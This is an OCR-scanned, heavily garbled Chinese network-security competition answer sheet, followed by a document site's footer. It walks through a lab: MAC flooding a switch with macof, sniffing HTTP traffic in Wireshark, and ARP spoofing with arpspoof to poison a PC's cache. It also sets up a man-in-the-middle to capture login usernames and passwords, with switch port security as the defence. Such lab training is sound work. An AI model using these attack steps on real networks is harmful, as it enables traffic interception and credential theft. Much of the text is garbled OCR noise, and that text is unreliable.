间;当前地址表记录数少于地址表容量;MaxentiresTotal••…:16384CurrententiresTotal:该数值小于10.从Kali发起MACFlooding渗透测试,使DCR咬换机的MAC地址表溢出,使其在MAGfe址表溢出的条件下,无法学习到PC1和DCSTfr的WebServ2003效劳器的MACfe址表信息,查看DCR支换机的MAGfe址表信息,并将渗透测试过程截图.〔5分〕Kali#macofVM一FileEditTerminalHtdp2505291eiwin512de:a2tleiIS:32te2ISte&iMiSbe.e.e.eHIM>A.B.B.A.3255A:£92444Ml;e〕win51211:2c%@与,$W破1>%MM7;S233LMN〔«1winRabJ45tal:&a:43:71c9t3B:77:49rc4:ale.S.e.e,52SW>9,2970:SLfifi27B2LS4l1U27B2194〔6〕win512仪37:42:J2:»:b:2eA9:lSiS»:b:»t79•MUIMN*5上MUE7G叫比d上47:w;74:f.;&«q36>«.»,*».3«MtrVlV731»lM:Lft75iei36〔e〕win512at2ci9a:47:eb:7b7b:nfi5B:?2te4:?59.Q.eLQ.3/6L9>e.e.e.e.zaagz:sifi^Tesleti62237HUC»〕win512口出门:制普:U44m4»,0.9,0.42947>%明H,B,47"3;5194399233船身,伸琥*2间winM2S;7fg7C;X;瓠37;“:74通卜4箝理审,a%%742sL>52»»«&44;2013598444〔&〕win5Uia:3a:17:fl4:5d:7f3C:23!Mi7l43:»»9.0.日,日.1492:S1374249609:13M2轴取e;g:Win512汕融必通i*:〔keb:9i:ai:7diJf129&而**%3罪%#sibhwsm〞g**77ge«eiwin$171II.fd:af:n.c:lb;cGb-1:J4372X:/二上.仇白,5">"明.?.如其亡:亭加和时打通海&4&973971A〕vMT512^rlr的fi」i:ilh1ri;F#I〔2分〕#showmac-address-tablecountvlan10Computethenumberofmacaddress.Maxentriescanbecreatedinthel&rgestcapacityc&xd:TotalFilterEntryNumber±s:16384StaticFilterEntryNumberis:16394UnicastFilterEntryNumberis:16384Currententrieshavebeencreatedinthesystem:TotalFilterEntryNumber工吕;16394IndividualFxl^terEntryNumberis:1G3S4StaticFilterEntryNumberis:0DynamicFilterEntryNumberis!16384当前地址表记录数等于地址表容量;MaxentiresTotal••…:16384CurrententiresTotal••…:该数值=16384〔3分〕
4.Kali翻开wireshark,验证在DCR咬换机MACf4.Kali翻开wireshark,验证在DCR咬换机MACfe址表溢出的条件下,可以监听到PC1访问DCS好的WebServ2003效劳器的HTT骑量,并将该验证过程截图.〔5分〕PC1通过InternetExplorer访问;〔截图〕地址栏包含:效劳器场景IP〔匹配参数表效劳器场景IP〕/Kali翻开wireshark,监听到PC1通过InternetExplorer访问DCSTI艮务器场景的HTT骑量;AkEdrtLsttieSvalabbcaptureintertazes..nrttpExpre"5siona.Clear内冲lyS百峭aFikerr:-"Mu.it□□irF『aEy24001:#21byt日方口门?3358bit、)-byt/百♦向『tursd(3^^bits)❶口int■电「1?口咱G二山芒中近工,小厂fu野m&cy即射〃匚却Fb!氏:川[2a〕.DskXal"“11_过至刎二jd〔±23二世;a2乂虫.InternetProtocol驹『以口口/Srcs18J舶+25a9©(192.ies.252.ao),Dst;192,168,252.111(192.168T尸grwmi事3k白介EritrisLPfuti0上屯BruFort::;471S7t丐7157】•Dstaurtmhtip(90),攵1』口亡k!】一LanDOOCCOLOCO2CCQ3C皿CCO^CDD7Ocoao009CME工(5254000197版fCSfdf40Z9d32f312b31*韭j.3fd453d笛蒯74Dd:26JO曲7b伽54SfDa43S63□i题6src的00*9IB502eG8C726CH*.E.■也{H…工.Q>EpP-L?)*=B.GEI/hlTrP/l.l..Ho产舟£ti*f|tlye.FCacst;n^x-CCtptEt3*a1工网事■L.Tat:152.111..Ca^ikmp"he-Centraca=0…A截图:Source:PC1的IP地址〔与参数表一致〕Destination:效劳器场景的IP地址〔与参数表一致〕Protocol:(5分).在DCR咬换机Kali所连接端口配置PortSecurity特性,阻止Kali发起MACFlooding渗透测试,验证此时DCR咬换机MACfe址表能够学习到PC1DCS好的WebServ200期艮务器的MACfe址,并将DCR咬换机相关配置信息以及验证信息截图.〔8分〕配置截图包含:mac-address-learningcpu-control〔2分〕在VLAN1的个接口全部启用如下:InterfaceEthernet1/0/Xswitchportport-security〔2分〕#clearmac-address-tabledynamic〔2分〕#showmac-address-tablecountvlan10DCRS-5650-28〔R4〕〔config〕^showmac-address-tablecountvlan10computethenumberofmacaddressMaxentriescanbecreatedinthelargestcapacitycard:TOC\o"1-5"\h\zTotalFilterEntryNumberis:16mB4ST^ficFilterEntryNumberis:1&304unica5tFiIterEntryNumberis:16364CurrentEntrieshavebeencreatedinthesystem:TotalFilterEntryNumberis:Sind-fvidualFilterEntryNumberis:8staticFilterEntryNumberis:0DynamicFilterEntryNumberis:8DCRS-5650-23〔R4〕〔config〕#DCRSfe址表空间中有可用的空间;当前地址表记录数少于地址表容量;MaxentiresTotal••…:16384CurrententiresTotal:该数值小于10〔2分〕.在DCR支换机配置PortSecurity特性的条件下,Kali再次翻开wireshark,监听PC1访问DCST^的WebServ2003效劳器流量,验证此时Kali无法监听到PC1访问DCSTH勺WebServ200阴艮务器的HTT骑量,并将验证过程截图.〔7分〕PC1通过InternetExplorer访问效劳器场景;〔截图〕地址栏包含:效劳器场景IP〔匹配参数表效劳器场景IP〕/……Kali翻开wireshark,监听不到PC1通过InternetExplorer访问DCS面HTT骑量;〔截图〕Filter:显示报文数:空任务5:数据窃取防护:AR■防〔45分〕.在PC1访问DCS井的WebServ2003I艮务器时,查看PC1和DCST中的WebServ2003效劳器的ARPg存信息,并将PC1和DCST中的WebServ2003效劳器的ARPg存信息截图.〔5分〕PC1WebServ2003Ipconfig/all分别显示PC1WebServ2003的IP和MACPC1的IP和MAC以太网迪配器&挝!造建士般特定的DHG般特定的DHG后缀
瑞林皿::::::VHCF^用•段屏宣包启用地址IPv4DIICT^CIA(DMmPC(cGDEFufiil^CuvitrullerFC=3F-DB-8G-4a-2fi工THF把KH::FcM:afal:一储:苜选,192.1GH.2&2.90<^^>319521307效劳器效劳器场景的IP和MACEthcnnctad.aptci&玄世1壬望2:CoConncct;ion—specif±cDNGGufflxDc^GirlptIonHICPliy3xcaJkDddi'cas.DHCPEhailed.IPA.■■■■■■**•■CubnetHaak■■■■■■**■DefaultGatcirMy£ncaltclfRTL8139FcuTiilyPCIFastEthernets52-G400AD:Nos172.1G9.252.111i25&.255.25S.0i172,1G9.252.101PC1通过InternetExplorer访问效劳器场景;〔截图〕地址栏包含:效劳器场景IP〔匹配参数表效劳器场景IP〕/PC1AR戏项内容为WebServ2003勺IP->WebServ2003的真实的MACCs^UstrrsdmljiIrdLur>Etrp-u除口;1?2fi168<252.90——0xdIntCTfiM地价物瑁地址192.1A8.25Z.1PR(W-1fi-31-f3-7a-f6192.lk8.Z5Z,11152-54-HHha3-46-adWebServ2003AR昧项内容为PC1的IP->PC1的真实的MAC
C:Miocimerit«andSettInosxfldnii>Istratof『aTnterfacr;192.1fiB.2S2.111——■flx1InternetftridressFhysicalAddressTjnifi192,168,252.fc-3f-dh-8c-4B-Zad4mHmic.在Kali对PC1进行ARPSpoofing渗透测试,使PC1无法访问DCS种的WebServ2003效劳器,PC1的ARF^存为:DCS日的WebServ2003效劳器IP->Kali的MACfe址,在PC1查看被Kali毒化后的ARFS存信息,并将该信息截图.〔5分〕Kali:#arpspoof-tPC1_IPWebServ2003_IPrnoTifjhtrnoTifjht:-+arpspooffttif:db:Rct-ia:?^192.168.2521110:[:PQMl:5:Bt>e:C!29;41:5:8be:c:29;41;5:Bb0:C:2H:4L:5:Bt>:54bg:C:29:41:5:Bb:5:8bth[:"二曲⑶后bfc;jf:db:ac;4a:watc:3f;db:8c:*lS;2afc:if:db:aci4d:2afc:3f;db;dc:4G;2afcilf!db3Bc:4n:2jesofi42:arprepl/42:arpreply6B6GA2:arpreplyL;<n":rr「epi?QUUti42;arpreply42:口reply1923fia192.163.2^2H111192.168.352.111192.Its.252.11111*2.ItU.252.111l9JnlfiB252.111ISat6:£:Z队41isate:c:293115-atfl:c:29:4115-8tB:C:29141IS-attl;C:29;41isat〔过程截图〕〔2分〕PC1ARRg项内容为WebServ2003勺IP->Kali的MAC瞿窸»□:192.lfiS.2E2.96-瞿窸Internet地ij物理地址192.16S.252.ia8W1&-3113-7*fG1106-00-39-41'0S-9bKaliMAC:ifconfig〔截图〕rfiatighr:*ifconfigethlLinkencap:EthernetHKaddr96:0c:29:41:05:8b
〔3分〕.在Kali对PC1和DCS种的WebServ2003l艮务器进行AR两间人渗透测试,使Kali能够使用wireshark监听到PC1向DCST中的WebServ2003I艮务器的LoginAuth.php页面提交的登录网站用户名、密码参数,并将该渗透测试过程截图.〔7分〕Kali:#arpspoof-tPC1_IPWebServ2003_IPfdiiIi#irp±pubtfdiiIi#irp±
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 巴彦淖尔市中医院消化内科内镜技师晋升高级技师考核试题
- 中国牛冻精项目商业计划书
- 石家庄市人民医院多胎妊娠减胎术技术准入考核
- 北京市人民医院心衰中心规范化管理年度审核
- 2025年中国三氧化铬项目投资计划书
- 巴彦淖尔市中医院肾上腺意外瘤诊疗策略考核
- 牡丹江市中医院血液病相关免疫学检测项目选择考核
- 2025年中国去甲氧基醉椒素项目创业计划书
- 忻州市中医院感染性疾病影像考核
- 长治市人民医院罕见病诊疗体系建设考核
- 急性呼吸窘迫综合征合并呼吸机相关肺炎护理查房
- 2025年公务员公开遴选笔试试题及答案(综合类)
- 门座式起重机司机模拟题(附答案)
- 水利水电安全生产应急预案措施
- 消化内镜教学课件
- 垂钓园转让合同(标准版)
- 医疗耗材采购流程及合同范本
- 智算产业园人才引进与培养方案
- 2024贵州省社区《网格员》备考题汇编(含答案)
- 无人机侦察机课件
- 西藏公务员2025年真题
评论
0/150
提交评论